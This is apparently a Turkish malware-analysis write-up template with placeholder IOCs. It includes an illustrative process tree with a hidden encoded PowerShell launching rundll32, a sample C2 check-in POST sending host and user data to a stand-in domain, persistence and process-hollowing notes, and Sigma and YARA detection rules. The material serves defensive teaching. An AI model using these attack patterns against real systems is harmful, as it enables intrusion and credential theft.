— Otopsi şablonu / [TARİH] —

Otopsi: [Örneğin Adı / Aile / Hash kısaltması]

Kısa bir saha notu. Bu Havari ne için geldi, kimin kapısını çaldı, hangi koridorda yakalandı? 2-3 cümle yeterli. Berserk dilinden bir cümleyle başla, sonra teknik gerçekliğe geç.

I. Saha Notu — Triage

Örneğin nereden geldiği, ilk tetiklenme bağlamı, hangi telemetride göründüğü. Kullanıcı şikâyeti mi, EDR alarmı mı, threat hunt mı?

Alan	Değer
Aile / İsim	[ör. AsyncRAT — "Slan'ın küçük çocuğu"]
Tip	[Loader / Stealer / RAT / Ransomware]
İlk görüldüğü tarih	[YYYY-MM-DD]
Platform	Windows 10/11 x64
Paketleyici	[UPX / Themida / custom / yok]
Dil / derleyici	[C/C++ MSVC / .NET / Go / Rust]

II. Damgalar — IOC

Tüm hash, IP, domain, mutex, dosya yolu ve registry anahtarları. Pyramid of Pain'e göre sıralanmış olması, okuyucuya hangisinin gerçekten "acıttığı"nı söyler.

Tip	Değer	Not
SHA256	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	Loader (Stage 1)
SHA256	bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb	Implant (Stage 2)
Domain	example-c2.tld	C2, Cloudflare arkasında
IP	198.51.100.42	VPS / kısa ömürlü
Mutex	Global\Behelit-7B2A	Tek-örnek garantisi
Path	%APPDATA%\Microsoft\WindowsHelp\svchost.exe	Persistence kopyası

III. Behelit'in Çağrısı — Initial Access & Execution

Örneğin sisteme nasıl geldiği. Phishing eki mi, ISO mu, MSI mi, tedarik zinciri mi? Process ağacı çıkar:

        process_tree.txt
        tree
      

explorer.exe
└── outlook.exe
    └── winword.exe   (Fatura_2026-04.docm)
        └── powershell.exe  -nop -w hidden -enc <b64>
            └── rundll32.exe  C:\Users\...\AppData\Local\Temp\h.dll,Start

IV. Havari'nin Anatomisi — Static Analysis

İmport tablosu, string'ler, sections, dikkat çeken API çağrıları. Paketleyici varsa unpack stratejisi.

Önemli string'ler

schtasks /create /tn "MicrosoftEdgeUpdateTaskMachine" ...
SeDebugPrivilege
\\.\pipe\behelit-7B2A
api/v1/checkin?id=
.AAAA-BERSERK-KEY-AAAA

Dikkat çeken API'ler

NtUnmapViewOfSection + VirtualAllocEx + WriteProcessMemory → klasik Process Hollowing.
BCryptDecrypt + sabit IV → şifreli payload, anahtar binary içinde.
CryptUnprotectData → tarayıcı kimlik bilgisi hırsızlığı.

V. Zırh Altındaki Kemik — Dynamic Analysis

Sandbox / debugger gözleminden çıkan davranış. Ekran görüntüsü, akış diyagramı, syscall trace.

        x64dbg_log.txt
        disasm
      

00007FF7`12340000  push    rbp
00007FF7`12340002  mov     rbp, rsp
00007FF7`12340005  sub     rsp, 30h
00007FF7`12340009  lea     rcx, [rip+0x12345]   ; "kernel32.dll"
00007FF7`12340010  call    LoadLibraryA
00007FF7`12340015  mov     [rbp-8], rax
00007FF7`12340019  lea     rdx, [rip+0x12350]   ; "VirtualAlloc"
00007FF7`12340020  mov     rcx, rax
00007FF7`12340023  call    GetProcAddress
00007FF7`12340028  ; --> klasik dynamic API resolution

VI. Tanrısal El'le Konuşma — C2 Protokolü

Network trafiği. JA3/JA4 parmak izleri, TLS SNI, HTTP başlık anomalileri, beacon aralığı, jitter.

POST /api/v1/checkin?id=8B11-0017 HTTP/1.1
Host: example-c2.tld
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64) Behelit/1.0
X-Brand: 7B2A
Content-Length: 84

{"hostname":"...","user":"...","os":"10.0.19045","key":"AAAA-BERSERK-KEY-AAAA"}

VII. Kara Süvari'nin Cevabı — Detection & Hunt

Sigma kuralı

        behelit_loader.yml
        Sigma
      

title: Behelit Loader — winword → powershell → rundll32
status: experimental
logsource: { product: windows, category: process_creation }
detection:
  s1:
    ParentImage|endswith: '\winword.exe'
    Image|endswith: '\powershell.exe'
  s2:
    ParentImage|endswith: '\powershell.exe'
    Image|endswith: '\rundll32.exe'
    CommandLine|contains: '\AppData\Local\Temp\'
  condition: s1 or s2
level: high
tags: [attack.t1059.001, attack.t1218.011, berserk.behelit]

YARA kuralı

        behelit_loader.yar
        YARA
      

rule The Black Forge_Behelit_Loader
{
    meta:
        author      = "Kara Süvari (The Black Forge)"
        description = "Behelit-7B2A loader (Stage 1)"
        date        = "2026-04-29"
        ref         = "https://infectedlab.com/posts/writeup-template.html"
    strings:
        $s1 = "Behelit-7B2A" wide ascii
        $s2 = "AAAA-BERSERK-KEY-AAAA" ascii
        $s3 = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? }  // LoadLibraryA pattern
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

VIII. Damga ve Defter — Sonuç

Bu Havari nereden geldi, ne yapmaya çalıştı, hangi acıyı bıraktı? Bir paragraf. Sonraki olası sürüm için tahmin: hangi TTP'leri değiştirebilir, hangi imzalar kalıcıdır?

IX. Damgayı İndir

Bu otopsiden çıkan damgaları ekibinin TIP/EDR/SIEM'ine doğrudan besleyebilirsin. İki format hazır bekliyor:

⚒ YARA kuralı (.yar) ☩ STIX 2.1 bundle (.json)

— Kara Süvari, [yer], [saat]. Defter kapanır.